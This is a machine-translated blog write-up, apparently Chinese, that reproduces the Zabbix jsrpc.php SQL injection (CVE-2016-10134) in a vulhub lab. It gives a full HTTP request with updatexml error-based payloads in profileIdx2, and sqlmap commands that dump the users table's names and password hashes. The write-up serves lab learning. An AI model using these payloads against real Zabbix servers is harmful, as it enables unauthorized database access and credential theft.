当前位置:网站首页>[vulhub shooting range]] ZABBIX SQL injection (cve-2016-10134) vulnerability recurrence
[vulhub shooting range]] ZABBIX SQL injection (cve-2016-10134) vulnerability recurrence
2022-06-24 07:29:00 【Refused guanxiaotong for many times】
List of articles
Preface
A few days ago, a little friend asked me to repeat this loophole , It can't be said to be repeated , The database cannot read , It's strange . So while I have this time today , Just do it , Take notes by the way .
Tips : The following is the main body of this article , The following cases can be used for reference
One 、 Introduction to loopholes
zabbix What is it? ?
zabbix Is a server monitoring software , The reason is server、agent、web And so on , among web Module by PHP To write , Used to display the results in the database .
Vulnerability environment
stay vulhub The range is reproduced , start-up zabbix 3.0.3.
Two 、 Repeat step
1. Start the vulnerability environment
Get into zabbix Catalog ,cd Get into CVE-2016-10134 Catalog , Enter the following command to start the range :
docker-compose up -d

After executing the command , Will start the database (mysql)、zabbix server、zabbix agent 、zabbix web. If the memory is a little small , There may be a situation where a container hangs up .
When all services are displayed done, To successfully visit :
After startup , Wait a moment , visit http://your-ip/8080, Successfully visited zabbix Interface .

2.sql Inject
zabbix Of jsrpc.php Page exists sql Loophole , So by visiting this jsrpc.php Page to trigger the vulnerability , Vulnerability parameter is profileIdx2. Send the following request package to execute sql command , Get database information .
The request package information is as follows :
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_sessionid=7689b1e30e63d9726fa86010d3c6592c; PHPSESSID=3r69f0snsemtpmkeiocgg9blj2
Upgrade-Insecure-Requests: 1

Successfully executed user() command , And return the information .
speak user() Modified into database(), Try to get the database name :
http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,database()),0)

If you are lazy, you can also use tools directly sqlmap, Everything came out after running , No experience :
sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1"

The user name and password are also fixed directly :
sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1" -D zabbix -T users -C name,passwd --dump

summary
It is an ordinary injection recurrence , There's no bypass , No difficulty .
Original article , Welcome to reprint , Please indicate the source of the article : 【Vulhub shooting range 】zabbix-SQL Inject (CVE-2016-10134) Loophole recurrence . Baidu and all kinds of collection stations are not credible , Search carefully to identify . Technical articles generally have timeliness , I am used to revise and update my blog posts from time to time , So visit the source to see the latest version of this article .
边栏推荐
- [WordPress website] 5 Set code highlight
- [WUSTCTF2020]alison_ likes_ jojo
- How can genetic testing help patients fight disease?
- bjdctf_2020_babystack
- [Proteus] Arduino uno + ds1307+lcd1602 time display
- What is an intrusion detection system?
- Win11怎么设置让CPU性能全开?Win11CPU怎么设置高性能模式?
- jarvisoj_level2
- Analog display of the module taking software verifies the correctness of the module taking data, and reversely converts the bin file of the lattice array to display
- 【信号识别】基于深度学习CNN实现信号调制分类附matlab代码
猜你喜欢
随机推荐
Can the small fire Chunfeng tea make its debut by "keeping fit"?
Bjdctf 2020 Bar _ Babystack
相機標定(標定目的、原理)
6000多万铲屎官,捧得出一个国产主粮的春天吗?
Development of IOT device end - establishment of development environment
Canal installation configuration
[机缘参悟-29]:鬼谷子-内揵篇-与上司交往的五种层次
基因检测,如何帮助患者对抗疾病?
Accessing user interface settings using systemparametersinfo
【图像分割】基于形态学实现视网膜血管分割附matlab代码
When MFC uses the console, the project path cannot have spaces or Chinese, otherwise an error will be reported. Lnk1342 fails to save the backup copy of the binary file to be edited, etc
MFC multithreaded semaphore csemaphore critical area and mutually exclusive events
[GUET-CTF2019]zips
[WUSTCTF2020]爬
Coding helps promote the internationalization of Tencent games
bjdctf_2020_babystack
[signal recognition] signal modulation classification based on deep learning CNN with matlab code
Unexpected token u in JSON at position 0
[Proteus] Arduino uno + ds1307+lcd1602 time display
[image segmentation] retinal vessel segmentation based on morphology with matlab code
![buuctf misc [UTCTF2020]docx](/img/e4/e160f704d6aa754e85056840e14bd2.png)


![[MRCTF2020]千层套路](/img/8e/d7b6e7025b87ea0f43a6123760a113.png)





